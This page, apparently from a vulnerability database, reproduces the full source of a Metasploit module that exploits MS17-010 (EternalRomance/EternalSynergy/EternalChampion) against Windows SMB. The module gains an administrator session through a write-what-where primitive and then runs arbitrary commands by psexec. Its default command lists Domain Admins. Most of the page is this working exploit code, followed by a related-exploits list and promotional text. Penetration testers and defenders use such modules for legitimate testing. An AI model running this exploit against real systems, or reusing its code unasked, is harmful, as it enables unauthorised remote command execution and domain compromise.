Lucene search
K

MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution

🗓️ 29 Jan 2018 01:13:25Reported by sleepya, zerosum0x0, Shadow Brokers, Equation GroupType 
metasploit
 metasploit
🔗 www.rapid7.com👁 82 Views

MS17-010 SMB Remote Windows Command Executio

Related
Code
ReporterTitlePublishedViews
Family
Gitee
Exploit for CVE-2017-0143
6 Sep 202500:38
gitee
Gitee
Exploit for CVE-2014-4878
28 Mar 202000:48
gitee
GithubExploit
Exploit for CVE-2017-0143
8 Jul 202117:35
githubexploit
GithubExploit
Exploit for CVE-2017-0143
8 Jul 202117:35
githubexploit
GithubExploit
Exploit for CVE-2017-0143
10 Feb 202603:59
githubexploit
GithubExploit
Exploit for CVE-2017-0143
8 Jul 202117:35
githubexploit
GithubExploit
Exploit for CVE-2017-0143
7 Oct 202006:19
githubexploit
GithubExploit
HTB-Blue-Writeup
17 May 202614:55
githubexploit
GithubExploit
windows7-eternalblue-lab
8 Jul 202610:18
githubexploit
GithubExploit
Exploit for CVE-2017-0143
8 Jul 202117:35
githubexploit
Rows per page
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010
  include Msf::Exploit::Remote::SMB::Client::Psexec
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution',
      'Description'    => %q{
          This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where
          primitive. This will then be used to overwrite the connection session information with as an
           Administrator session. From there, the normal psexec command execution is done.

          Exploits a type confusion between Transaction and WriteAndX requests and a race condition in
          Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy
          exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a
          named pipe.
      },

      'Author'         => [
        'sleepya',          # zzz_exploit idea and offsets
        'zerosum0x0',
        'Shadow Brokers',
        'Equation Group'
      ],

      'License'        => MSF_LICENSE,
      'References'     => [
        [ 'MSB', 'MS17-010' ],
        [ 'CVE', '2017-0143'], # EternalRomance/EternalSynergy - Type confusion between WriteAndX and Transaction requests
        [ 'CVE', '2017-0146'], # EternalChampion/EternalSynergy - Race condition with Transaction requests
        [ 'CVE', '2017-0147'], # for EternalRomance reference
        [ 'URL', 'https://github.com/worawit/MS17-010' ],
        [ 'URL', 'https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf' ],
        [ 'URL', 'https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/' ],
      ],
      'DisclosureDate' => '2017-03-14',
      'Notes' =>
          {
              'AKA' => [
                  'ETERNALSYNERGY',
                  'ETERNALROMANCE',
                  'ETERNALCHAMPION',
                  'ETERNALBLUE'      # does not use any CVE from Blue, but Search should show this, it is preferred
              ]
          }
    ))

    register_options([
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
      OptString.new('COMMAND', [true, 'The command you want to execute on the remote host', 'net group "Domain Admins" /domain']),
      OptPort.new('RPORT', [true, 'The Target port', 445]),
      OptString.new('WINPATH', [true, 'The name of the remote Windows directory', 'WINDOWS']),
    ])

    register_advanced_options([
      OptString.new('FILEPREFIX', [false, 'Add a custom prefix to the temporary files','']),
      OptInt.new('DELAY', [true, 'Wait this many seconds before reading output and cleaning up', 0]),
      OptInt.new('RETRY', [true, 'Retry this many times to check if the process is complete', 0]),
    ])

    deregister_options('SMB::ProtocolVersion')
  end

  def run_host(ip)
    begin
      if datastore['SMBUser'].present?
        print_status("Authenticating to #{ip} as user '#{splitname(datastore['SMBUser'])}'...")
      end
      eternal_pwn(ip)         # exploit Admin session
      smb_pwn(ip)             # psexec

    rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e
      print_error("#{e.message}")
    rescue ::Errno::ECONNRESET,
           ::Rex::HostUnreachable,
           ::Rex::Proto::SMB::Exceptions::LoginError,
           ::Rex::ConnectionTimeout,
           ::Rex::ConnectionRefused  => e
      print_error("#{e.class}: #{e.message}")
    rescue => error
      print_error(error.class.to_s)
      print_error(error.message)
      print_error(error.backtrace.join("\n"))
    ensure
      eternal_cleanup()       # restore session
    end
  end

  def smb_pwn(ip)
    text = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.txt"
    bat  = "\\#{datastore['WINPATH']}\\Temp\\#{datastore['FILEPREFIX']}#{Rex::Text.rand_text_alpha(16)}.bat"
    @smbshare = datastore['SMBSHARE']
    @ip = ip

    # Try and authenticate with given credentials
    output = execute_command_with_output(text, bat, datastore['COMMAND'], @smbshare, @ip, delay: datastore['DELAY'], retries: datastore['RETRY'])

    # Report output
    print_good("Command completed successfully!")
    print_status("Output for \"#{datastore['COMMAND']}\":\n")
    print_line("#{output}\n")
    report_note(
      :rhost => datastore['RHOSTS'],
      :rport => datastore['RPORT'],
      :type  => "psexec_command",
      :name => datastore['COMMAND'],
      :data => output
    )
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation